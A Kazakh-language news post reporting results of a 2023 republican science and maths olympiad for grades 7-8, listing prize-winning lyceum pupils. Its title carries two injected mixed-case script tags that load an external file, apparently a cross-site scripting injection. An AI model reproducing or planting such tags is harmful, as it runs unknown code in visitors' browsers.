7-8 сынып оқушыларына арналған жаратылыстану-математикалық бағыттағы жалпы білім беретін пәндер бойынша республикалық олимпиадасының қорытындысы<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

29.05.2023

2023 жылғы 23-24 мамыр аралығында Астана қаласында 7-8 сынып оқушыларына арналған жаратылыстану-математикалық бағыттағы жалпы білім беретін пәндер бойынша республикалық олимпиадасының қорытынды кезеңі өтті.  Қорытынды кезеңіне еліміздің барлық өңірінен 304 жасөспірім жолдама алды. Елордамызға қонаққа келген жасөспірімдерге «Ailand» ойын-сауық орталығына саяхат ұйымдастырылды.

Олимпиаданың мақсаты - оқушылардың жаратылыстану-математикалық бағыттағы пәндерді тереңдетіп оқытуға қызығушылығын арттыру, жоғары деңгейдегі олимпиадаларға жасөспірімдерді даярлау жүйесін жетілдіру және олимпиадалық резерв құру.

Олимпиада 6 пән бойынша жалпы білім беретін бағдарламалар негізінде өткізілді: математика, физика, химия, биология, география, информатика.

Олимпиаданың қорытындысы бойынша жүлдегерлердің жалпы саны 137 оқушыны құрады. 25 жеңімпаз 1-дәрежелі дипломмен, 44 жасөспірім 2-ші дәрежелі дипломмен және 68 жүлдегер 3-ші дәрежелі дипломмен марапатталды.Сондай-ақ, ерекше нәтиже көрсеткен 29 оқушыға мақтау қағаздары тапсырылды.

Олимпиадаға облыстық кезеңнің 12 жеңімпазы қатысты.

Олимпиада нәтижелеcі бойынша:

ІI-дәрежелі диплом иегерлері:

1. Химия пәні бойынша Егінбай Ақерке - Щучинск қаласының "Білім-инновация" IT лицей-интернатының 8-сынып оқушысы;

2. Информатика пәні бойынша  Шаймерден Нұрәлі - Көкшетау қаласы,"Білім-инновация" лицей-интернатының 7-сынып оқушысы

3. Информатика пәні бойынша  Қуанышбек Нұрислам - Көкшетау қаласы,"Білім-инновация" лицей-интернатының 8-сынып оқушысы.

IІІ-дәрежелі диплом иегерлері:

1. Физика пәні бойынша Саберлинов Нурислам – Көкшетау қаласы, "Білім-инновация" лицей-интернатының 8-сынып оқушысы;

2. География       пәні бойынша      Толегенов Ерсултан - Көкшетау қаласы, "Білім-инновация" лицей-интернатының 7-сынып оқушысы.

Грамота иегерлері:

1. Биология пәні бойынша Хамитов Максат - – Көкшетау қаласы, "Білім-инновация" лицей-интернатының 8-сынып оқушысы;

2. Физика пәні бойынша Нұрғали Диас – Көкшетау қаласы, "Білім-инновация" лицей-интернатының 7-сынып оқушысы.

         Жас олимпиадашыларды құттықтаймыз және болашақ зияткерлік жарыстарда жаңа жеңістер мен табыстар тілейміз!!!

Просмотров: 803


Пікір қосу



Деректерді қолтаңбаға қосу